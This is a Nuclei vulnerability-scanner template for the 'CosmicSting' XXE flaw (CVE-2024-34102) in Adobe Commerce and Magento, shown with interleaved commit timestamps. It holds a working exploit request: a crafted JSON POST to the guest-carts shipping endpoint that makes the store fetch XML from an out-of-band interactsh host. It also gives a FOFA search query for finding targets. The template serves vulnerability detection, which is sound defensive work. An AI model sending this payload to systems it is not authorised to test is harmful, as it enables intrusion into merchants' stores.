2024-06-25 17:15:09 +00:00
id : CVE-2024-34102
info :
name : Adobe Commerce & Magento - CosmicSting
author : DhiyaneshDK
severity : critical
description : |
Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution.
reference :
- https://github.com/spacewasp/public_docs/blob/main/CVE-2024-34102.md
metadata :
fofa-query : app="Adobe-Magento"
verified : true
max-request : 1
tags : cve,cve2024,adobe,magento,xxe
http :
- raw :
- |
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/1.1
Host : {{Hostname}}
Content-Type : application/json
{"address" : {"totalsCollector" : {"collectorList" : {"totalCollector" : {"sourceData" : {"data" : "http://{{interactsh-url}}/xxe.xml" , "dataIsURL" : true , "options" : 12345678 }}}}}}
matchers-condition : and
matchers :
- type : word
part : interactsh_protocol # Confirms the DNS Interaction
words :
2024-06-26 08:57:08 +00:00
- 'dns'
2024-06-25 17:15:09 +00:00
- type : word
part : body
words :
2024-06-26 08:57:08 +00:00
- '"message":'
2024-06-25 17:15:09 +00:00
- type : word
part : header
words :
- "application/json"
2024-06-26 09:02:55 +00:00
# digest: 4b0a00483046022100e6222a784967f5148b72e2585b0f394f446904586f8fe41c5fe7dc653e67d787022100c1a861f3f02ae0a37f8e0ae99dd731d946a0c00e0ca5f31a609d018e23104dd4:922c64590222798bb761d5b6d8e72950